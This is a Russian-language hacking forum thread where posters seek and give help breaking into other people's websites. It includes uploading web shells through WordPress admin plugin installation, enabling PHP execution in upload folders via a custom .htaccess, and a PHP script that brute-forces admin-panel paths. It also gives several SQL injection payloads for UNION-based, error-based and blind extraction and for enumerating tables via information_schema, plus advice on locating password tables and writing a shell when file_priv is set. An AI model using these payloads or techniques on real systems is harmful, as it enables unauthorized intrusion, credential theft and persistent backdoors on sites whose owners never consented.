Приветствую мужики! Есть доступ в админку WordPress. Заливаю шелл через Plugin Insallation. Смотрю в Library путь к этому шеллу. Захожу на него и получаю 403 You don't have permission to access... Почему такое происходит? И как решить данную проблему? Спасибо.
А как в другую директорию залить? Если вместе с темой, то она автоматом падает zip архивом в дефолтную папку. И лежит там простым архивчиком. Для установки темы нужен ftp пароль. В Media Settings убрал галочку с "Organize my uploads into month- and year-based folders". Начало заливать всё в wp-content/uploads, но оттуда так же 403 выдает. Мини шелл так же блокируется.
С удовольствием залил бы, но при редактировании шаблонов, и плагинов: "You need to make this file writable before you can save your changes." Так как залить в корень? Подскажет кто?
кто может помочь есть сайт (в личку) CMS Айсберг (если я правильно определил), в havaj 1.6 инъекция раскручивается нормально, но вот понять где в БД пароль хранится и хранится ли он вообще в БД не пойму. уже несколько дней изучаю их БД успехов ноль.
сразу подумал об этом, но там только одна БД кстати вход в админку там через CPanel, может это как то поможет
Cpanel - это не совсем админка сайта. Это что-то на подобие админки хостинга. Найти админку можешь с помощью такого php скрипта PHP: <?php set_time_limit(0); $name = "admindic.txt"; // База админок $adres = "http://www.site.com"; // Url без / в конце $file = array_map("trim", file($name)); $ch = curl_init(); foreach ($file as $line) { curl_setopt($ch, CURLOPT_URL, $adres.$line); curl_setopt($ch, CURLOPT_HEADER, TRUE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $res = curl_exec($ch); if (preg_match("~^HTTP/\d.\d 2\d\d|^HTTP/\d.\d 3\d\d~", $res)) { echo $line."<br>\r\n"; flush(); ob_flush(); } } curl_close($ch); Только здесь нужна собственная коллекция админок =) По началу можешь пользовать эту: http://pastebin.com/NPxYRY1u А пароль и имя пользователя чаще всего хранятся в таблицах: user, users, admin, admin_users, login и т.д. Тебе же нужно просто просмотреть все таблицы и найти хоть что-то где может быть написано password, pwd, passwd. Так же посмотри на File_Priv. Если Y - можешь попробовать залить шелл и без пароля администратора, но здесь придется искать полный путь к директории на сервере. Ищи "Полный F.A.Q. по SQL injection" здесь на сайте.
Получил доступ к админ панели одного сайта, пытаюсь залить шелл, нашел только одну папку в которую можно залить. Залил, казалось бы все ок. Пробую выполнить залитый шелл, вываливается такая шляпа: .htaccess'a в папке не лежит, кто что может предложить? P.s. любые файлы на пыхе работать категорически отказываются.
эти пути уже давно пробил результат 0 все найденные уже пробил, паролей 0 их вообще нет, хотя кое какие логины нашел
залей свой хтаккес с разришением выполнеения пыха в картинках значит сайт без админки, поетому и паролей нет
Есть сайт с уязвимым полем &id=5151 Ставлю в конце ковычку одинарную &id=5151' - вот что получаю в ответ: MySQL error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '')' at line 1 Query: SELECT `id`, `name`, `uniqum`, `image`, `catsID` FROM `ap_products` WHERE `enable`=1 AND `id` IN(0,5151') Есть исходный код данного участка кода: PHP: $sql = 'SELECT `id`, `name`, `uniqum`, `image`, `catsID`,`in_stock`,`cant_buy` FROM `'.$DB_prefix.'products` WHERE `enable`=1 AND `id` IN (0,'; foreach($Basket AS $code => $bskt) $sql.= $code.','; $sql = substr($sql,0,-1).')'; $sql = query($sql); Подскажите, как правильно составить запрос, чтобы выполнилась скуль?
Думаю, нужно попробовать так &id=5151)+and+1=2+union+select+111,222,333,444,555+--+ Ну и понеслась...
Имеется сайт с sql injection вида: http://site/id/5 Комменты не срабатывают. Пришлось проэксплуатировать баг так: http://site/id/5'and(mid(version(),1,1)=5)and'1 Как все это дело автоматизировать в sqlmap? ЧПУ...
как правильно составить запрос в vBulletin 4.0.3 что бы получить префикс к таблицам? вот так ошибка в исходнике страници пишет что такой таблици не существует
&cat[0]=1) union select table_name from information_schema.tables limit 0,1# и перебирай через limit пока свою таблицу не найдешь.
Есть скуль MySQL error based .php?avto=5+and(select+1+from(select+count(*),concat((select+(select+concat(0x7e,0x27,unhex(Hex(cast(user()+as+char))),0x27,0x7e))+from+`information_schema`.tables+limit+0,1),floor(rand(0)*2))x+from+`information_schema`.tables+group+by+x)a)+and+1=1 При таком запросе, вытает: Ошибка SQL запросаDuplicate entry '~'user_mysql@localhost'~1' for key 'group_key' Подскажите как правильно составить запрос чтобы залить напрямую шелл? Знаю полный путь и что file_priv = Y
